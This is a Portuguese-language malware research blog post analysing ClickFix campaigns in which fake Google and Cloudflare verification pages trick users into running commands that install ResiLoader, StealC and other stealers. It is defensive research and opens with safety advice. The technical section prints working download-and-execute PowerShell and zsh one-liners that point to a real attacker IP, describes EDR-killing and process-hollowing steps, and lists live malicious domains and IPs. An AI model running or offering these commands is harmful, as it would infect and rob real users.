Páginas falsas de verificação do Google e da Cloudflare disseminam várias famílias de malware

| 2 de julho de 2026
Páginas falsas de verificação do Google e da Cloudflare disseminam várias famílias de malware

Os ataques do tipo ClickFix, que levam as pessoas a executarem comandos maliciosos por conta própria, continuam a evoluir. Essa campanha mais recente utiliza páginas falsas de verificação do Google e da Cloudflare para convencer as vítimas a infectarem seus próprios dispositivos.

Um único erro pode instalar um malware que rouba senhas e outros dados confidenciais, concede aos invasores acesso remoto ao seu computador ou baixa outros malwares capazes de assumir o controle total do seu sistema.

Descobrimos várias campanhas que utilizavam a mesma infraestrutura para distribuir malware, incluindo HijackLoader, StealC, Remus, Amatera Stealer, CastleLoader, NetSupport e um stealer baseado em Rust.

Em uma cadeia de infecção, uma versão trojanizada do aplicativo legítimo de mensagens Franz baixa um carregador até então não documentado, chamado ResiLoader, que desativa o software de segurança antes de implantar o infostealer StealC.

Antes de entrarmos nos detalhes técnicos, veja aqui como evitar se tornar a próxima vítima.

Como se manter seguro

Os ataques do ClickFix dependem de convencer você a executar comandos por conta própria. A abordagem mais segura é simples:

  • Nunca copie e execute comandos de um site, a menos que esteja seguindo instruções de uma fonte confiável e compreenda exatamente o que o comando faz.
  • Tenha cuidado com páginas de verificação. O Google, o Cloudflare, a Microsoft e outros serviços legítimos nunca pedirão que você cole comandos do PowerShell no Windows provar que é humano ou Windows resolver um problema.
  • Não deixe que a urgência o apresse. Páginas falsas de verificação costumam usar contadores regressivos, contadores de visitantes ou avisos para pressioná-lo a agir rapidamente.
  • Mantenha seu software de segurança atualizado. A proteção em tempo real e a proteção na web podem ajudar a bloquear sites maliciosos antes que você acesse-os.
  • Desconfie de instruções técnicas inesperadas. Se um site solicitar que você abra o PowerShell, o Prompt de Comando ou o Terminal, pare e verifique as instruções por meio dos canais oficiais de suporte da empresa.

Dica profissional: Malwarebytes Browser Guard pode alertá-lo quando um site tentar copiar conteúdo para a sua área de transferência — um truque comum usado pelas páginas do ClickFix.

Análise técnica

As campanhas analisadas nesta pesquisa estão ativas desde, pelo menos, o final de 2025 e utilizam uma variedade de páginas falsas do Google e da Cloudflare para distribuir malware. Embora as iscas sejam diferentes, elas compartilham grande parte da mesma infraestrutura e cadeia de infecção, com os invasores testando continuamente novos métodos de distribuição e cargas maliciosas.

Iscas diferentes, um único objetivo

A maioria das campanhas apresenta várias características em comum:

  • Como usar a pasta C:\ProgramData\Zooms para extrair os estágios posteriores
  • Comandos do PowerShell ClickFix que seguem padrões semelhantes
  • Uso de buckets do Cloudflare R2 para distribuir cargas úteis
  • Endereços IP hospedados pela ASN Dedik Services Limited
  • Respostas em HTML que contenham apenas a frase "hehe"

Esses indicadores mudaram ao longo do tempo, por isso não aparecem em todas as cadeias de infecção. As campanhas continuam a evoluir, com novas cargas maliciosas e métodos de distribuição sendo introduzidos regularmente. Por exemplo, em alguns casos, o endereço IP é usado diretamente para a distribuição da carga maliciosa, em vez de buckets.

O comando final copiado pelo usuário geralmente segue este padrão: 

powershell -c “iex(irm ‘{IP}:{Port}/{Random Path}’ -UseBasicParsing)”

A porta e o caminho nem sempre estão presentes nos casos analisados; as portas são aleatórias, mas algumas das utilizadas são: 6600, 9900, 5506, 7895, 7493, 149, 8442. 

Para executar esses comandos, são utilizados vários modelos relacionados ao ClickFix, principalmente ligados ao Google e ao Cloudflare. Também detectamos que, em alguns casos, o comando do PowerShell foi distribuído por meio da estrutura IClickFix. 

Observamos que essas campanhas do ClickFix estavam sendo divulgadas por meio de:

  • Sites antigos que provavelmente expiraram e foram readquiridos pelo(s) autor(es).  
  • CloudFlare Pages (.pages.dev domínios). 
  • Sites comprometidos. 
  • Serviços falsos, por exemplo, relacionados a códigos QR ou acesso a arquivos na web. 

O Google ClickFix atrai 

Os responsáveis por essas campanhas utilizam diversas páginas HTML e kits relacionados ao Google. 

Uma isca se faz passar pela verificação do Google reCAPTCHA. As páginas estão hospedadas em URLs aleatórios que exibem conteúdo falso ou malicioso. Esses domínios costumam ser registros antigos que recentemente passaram a apontar para novos endereços IP, o que sugere que foram reaproveitados para a campanha.

Algumas dessas páginas possuem parâmetros de URL como “zoneid”, “cost”, “device”, “country” e “clickid”, por exemplo: 

  • /conf/captcha.html?zoneid=10420852 
  • /wincapbot/nobot.html 
  • /xmr/trkuste.php?zone=5327134 
  • bless.php?zoneid=10327549&clickid=1091581084925173761&cost=0.000000&country=US&device=desktop 
Página do ClickFix “Verificação manual necessária”
Página do ClickFix “Verificação manual necessária”
Página do ClickFix “Verificação manual necessária”

Nesse caso, as funções relacionadas ao ClickFix estão implementadas na classe CustomCaptcha. O comando está escrito em texto simples, sem qualquer ofuscação. 

Método “StartVerification” na classe “CustomCaptcha”
Método “StartVerification” na classe “CustomCaptcha”

Outro método de distribuição utiliza o Cloudflare Pages hospedado em .pages.dev subdomínios.

Página “Confirme que você é humano” do ClickFix
Página do ClickFix: “Confirme que você é humano”

Nesse caso, a página HTML é ofuscada por meio da declaração de várias variáveis e da aplicação da operação XOR entre elas. O código desofuscado é chamado de SECURITY GATEWAY e é composto pelas funções GatewayRuntime, RemoteVault, BeaconDispatcher, Clipboard, TokenControllere PanelController.  

O código permite que os invasores recuperem o comando remotamente ou localmente. Neste exemplo, o comando malicioso do PowerShell está armazenado localmente.

O comando do PowerShell declarado no código “SECURITY GATEWAY”
O comando do PowerShell declarado no código “SECURITY GATEWAY”

Também descobrimos que alguns desses domínios já haviam distribuído outro isco no passado, neste caso associado a um login não autorizado no Google. Esse isco do ClickFix pede ao usuário que copie e cole o comando malicioso para definir seu dispositivo como principal. 

Página do ClickFix “Novo login com token confiável”
Página do ClickFix “Novo login com token confiável”

O que chama a atenção nesse kit ClickFix é que ele possui um “portão de aprovação”, conforme descrito nos comentários, e que o invasor precisa selecionar manualmente, no painel, qual comando o usuário deverá executar. 

Comentários sobre o kit e o “processo de aprovação”
Comentários sobre o kit e o “processo de aprovação”
Comentários sobre o kit e o “processo de aprovação”

Em campanhas mais recentes, detectamos uma isca do ClickFix relacionada ao Google Meet, que exige que se copie e cole um comando malicioso para corrigir problemas de áudio. 

A isca “corrigir driver de áudio” do Meet ClickFix
A isca do Google Meet ClickFix chamada “corrigir driver de áudio”

Nos casos analisados, o desfecho /api/driver-clipboard.php retornou o seguinte comando malicioso:

{"mac":"curl -kfsSL $(echo '…'|base64 -D)|zsh","windows":"powershell -c \"iex(irm '151.240.151.126/rRlmZcaaZfAE3U2BaH' -UseBasicParsing)\""} 

Outras iscas 

Os responsáveis por essa campanha utilizam diversos kits e iscas, em sua maioria relacionados ao Google. No entanto, detectamos outras iscas que copiavam comandos relacionados à mesma infraestrutura. 

Os invasores por trás dessas campanhas também comprometem vários sites usando diferentes modelos relacionados à isca do CloudFlare ClickFix

“Confirme que você é humano” – Páginas do ClickFix
“Confirme que você é humano” – Páginas do ClickFix
“Confirme que você é humano” – Páginas do ClickFix

Detectamos vários modelos utilizados nas páginas do CloudFlare. O comando está presente de forma visível ou, em alguns casos, ofuscado nos casos analisados. 

Algumas das páginas HTML do ClickFix da CloudFlare 
Algumas das páginas HTML do ClickFix da CloudFlare 
Algumas das páginas HTML do ClickFix da CloudFlare 
Algumas das páginas HTML do ClickFix da CloudFlare 

Também detectamos alguns sites falsos criados especificamente para oferecer serviços. Por exemplo, um site chamado “My QR Generator” exibe um código QR ofuscado e solicita que o usuário execute um comando do PowerShell para comprovar que não é um robô. 

Página de atração do ClickFix com “Código QR” 
Página de atração do ClickFix com “Código QR” 

Nesse caso, o comando está codificado em base-64: 

Comando do PowerShell decodificado
Comando do PowerShell decodificado

Programa para baixar o PowerShell 

O comando ClickFix executado pelo usuário decodifica um script e o salva na pasta Temp com o nome tmp{4 char}.tmp.ps1

Detectamos várias variações desse script, mas as versões mais recentes fazem o seguinte: 

  • Crie a pasta C:\ProgramData\Zooms
  • Baixe a próxima etapa de um bucket do CloudFlare e salve-a em C:\ProgramData\Zooms. Em algumas variantes do script, a próxima etapa é baixada diretamente de um endereço IP. 
  • Envie as informações do computador comprometido para http://{IP}/dl-callback. Em algumas variantes do roteiro, essa parte não está presente. 
Script do PowerShell solto
Script do PowerShell solto

Os invasores por trás dessas campanhas utilizam um grande número de cargas úteis diferentes. As campanhas distribuem uma ampla variedade de cargas úteis. A tabela abaixo resume alguns dos nomes dos arquivos baixados e o malware que eles instalam. Em muitos dos casos analisados, a carga útil final foi distribuída por meio do sequestro de DLL, como também veremos mais adiante no caso do StealC. 

Arquivo distribuído Malware distribuído 
libEGL.zip, Safe-1.zip Aplicativo Electron com código malicioso, ResiLoader e StealC 
Test.msi Deno Loader e PowerShell Stealer 
arworks.zip Amatera Stealer 
water-night.zip Remus Stealer 
Setup.msi, Invintrum_first.msi NetSupport 
traffic1.msi CastleLoader 
ibrowser.exe Ladrão de Ferrugem 

Analisamos um novo carregador chamado ResiLoader, que, em última instância, distribui o StealC. Também detectamos que o autor da ameaça, nas campanhas mais recentes, passou a usar o Deno para distribuir, por fim, um stealer desenvolvido em PowerShell; a análise dessa cadeia de infecção poderá ser tema de uma futura postagem no blog. 

O aplicativo Electron infectado com um trojan faz o download do ResiLoader

Nesse caso, o arquivo ZIP foi baixado de: 

  • pub-7080e0c20a0e47ca95a476869c532367.r2[.]dev/libEGL.zip 

Após a extração para: 

  • C:\ProgramData\Zooms\libEGL.zip_ext

O arquivo zip contém uma versão infectada com um trojan do aplicativo de mensagens de código aberto chamado “Franz”: 

O aplicativo “Franz”, infectado por um trojan, usado para baixar o ResiLoader
O aplicativo “Franz”, infectado por um trojan, usado para baixar o ResiLoader

O código malicioso está implementado no index.js arquivo: 

O código ofuscado no aplicativo com backdoor
O código ofuscado no aplicativo com backdoor

O programa de download realiza as seguintes operações: 

  • Decodifique as sequências de caracteres com a função HC()
  • Leituras readme.txt, espera uma chave de campanha no formato AAAA-BBBB, retorna como uma matriz de tokens. Nesse caso, o nome é resiloader-1 e, por isso, chamamos a DLL baixada de “ResiLoader”. 
  • Leituras %APPDATA%\setup.txt; se estiver ausente, gera uma sequência aleatória de 8 caracteres e a armazena.  
  • Como obter persistência usando app.setLoginItemSettings
  • Envia uma solicitação POST para https[:]//completstep[.]com/api/ e elaborar a resposta em JSON
    • Se task.e se estiver presente, ele é executado eval(task.e); isso permite que o invasor execute código JavaScript arbitrário. 
    • Se task.files se estiver presente, crie %TEMP%\<Date.now()>\, decodificar e gravar cada arquivo; se algum nome de arquivo terminar em .exe, execute-o por meio de child_process.exec

No nosso caso, recebemos um arquivo ZIP que realiza o sequestro de DLL de ssh-add.exe

{"task":{"name":"JUNE18USY","files":{ 

   "msys-2.0.dll":"<base64>", 

   "msys-crypto-3.dll":"<base64>", 

   "msys-gcc_s-seh-1.dll":"<base64>", 

   "ssh-add.exe":"<base64>" }}}

Em seguida, o executável foi executado com: 

C:\WINDOWS\system32\cmd.exe /d /s /c ""C:\Users\{user}\AppData\Local\Temp\1782122017599\ssh-add.exe"" 

ResiLoader

O msys-crypto-3.dll é um código ofuscado .NET NativeAOT loader que implementa a evasão de antivírus/EDR por meio de uma técnica BYOD, obtém persistência e, por fim, carrega o roubador de dados StealC. Não encontramos uma atribuição específica para esse carregador e, por isso, o chamamos de “ResiLoader”, com base na string presente em versões anteriores readme.txt

O carregador contém várias sequências de caracteres, algumas em texto simples e outras criptografadas. Após descriptografar essas sequências, é possível ter uma visão completa da funcionalidade do ResiLoader. 

MANPO: ReadModule len=... 

MANPO: magicOffset=...
… 

PERS: FAIL all file copies failed, skipping run key 

PERS: FAIL both HKLM and HKCU Run key writes failed 
… 

RUNPE: CreateProcess failed 

RUNPE: PEB patched 

RUNPE: VirtualAllocEx failed 
… 

POST: RunForever exited (unexpected) 

POST: entering RunForever 

POST: hollow=

A carregadeira realiza as seguintes operações: 

  • Extraia o blob codificado que contém duas cargas úteis, lendo o marcador AtLorenBase e o comprimento do blob codificado. Em seguida, ele decodifica o blob e descriptografa o driver pcdhost.sys (OPSWAT  
    (AppRemover Driver) e a carga útil StealC, utilizando um algoritmo de descriptografia personalizado.  
  • Encerre mais de 140 processos relacionados a EDR/AV usando o driver desativado. 
  • Contornar o UAC por meio de ICMLuaUtil Interface COM elevada. 
  • Criar uma pasta C:\ProgramData\Google Update, copiando-se a si mesmo; adicionando persistência por meio da chave de registro RUN 
  • cmd /c start "" /D "C:\ProgramData\Google Update" ssh-add.exe 

Por fim, o carregador realiza o esvaziamento do processo ServiceModelReg.exe para executar o StealC. 

IOCs 

Hash 

72907d0ca3258365838626f6a8d993a6: DLL do ResiLoader 

0234E3188F2883A438B3F2BEAB7A78B2: StealC 

6a9ac6b3fff7b695dbd4df6ff7f6c516: Remus 

206ce339febca0c3bcc850f42595fc63: Amatera Stealer 

eee416efcb1e33f220cdb4b05496a07a: NetSupport RAT 

b8d53740024d126cb55f83854335a4ab: Ladrão de Ferrugem 

Domínios 

Distribuir as páginas do ClickFix: 

onegeekworld[.]com 

thefirmos[.]com 

antibotv3[.]com 

centralwildcats[.]com 

cloud.antibotv3[.]com 

cloudautosolutions[.]com 

sunseekersupply[.]com 

123clocks[.]com 

orcanegames[.]com 

rwmonitoring[.]com 

100furniture[.]com 

nepalcharchaa[.]com 

p-floribunds.pages[.]dev 

pg-altirade2.pages[.]dev 

pg-cordivant-m6.pages[.]dev 

g-luminence.pages[.]dev 

generator-qrcode[.]online 

regdev-google[.]com 

khosla[.]capital 

eorgke09054909j[.]com 

dropboxi[.]com 

Buckets do CloudFlare utilizados para a distribuição da carga útil

pub-4ed7b8ecee744dea930d74ba4ac74285.r2[.]dev 

pub-620528e2dc874e16937673265aa23d39.r2[.]dev 

pub-4ed7b8ecee744dea930d74ba4ac74285.r2[.]dev 

pub-9682d5896df841679c5a17eb41273f89.r2[.]dev 

pub-18d99d0d18b94e85824c1cc4d5b5c637.r2[.]dev 

pub-0170eabb9df346bd822f863b7c3946e3.r2[.]dev 

pub-4ed7b8ecee744dea930d74ba4ac74285.r2[.]dev 

unitedstateverif[.]com: distribuição da carga útil 

bigflaredefence[.]com: distribuição da carga útil 

popularcard[.]shop: Rust Stealer C2 

xzz[.]proxygrid[.]cc: Amatera Stealer C2 

completstep[.]com: Carregador C2 

eventlogerps1[.]ink: Deno Loader  

be231ro963[.]com: Deno Loader  

IPs 

IP utilizado para a distribuição da carga útil

151.240.151[.]126 

85.239.149[.]16 

85.239.149[.]40 

93.152.224[.]29 

151.240.151[.]46 

93.152.224[.]167 

85.239.149[.]78 

192.69.195[.]131 

135.181.171[.]40 

94.26.83[.]206 

91.92.34[.]128 

85.239.144[.]31 

93.152.224[.]39 

94.26.90[.]112 

146.19.248[.]120: StealC C2 

Agradecimentos  

Sobre o autor

Gabriele é um engenheiro de pesquisa de malware que adora combater malware. Quando não está fazendo isso, você o encontrará curtindo a natureza, a arte e os animais.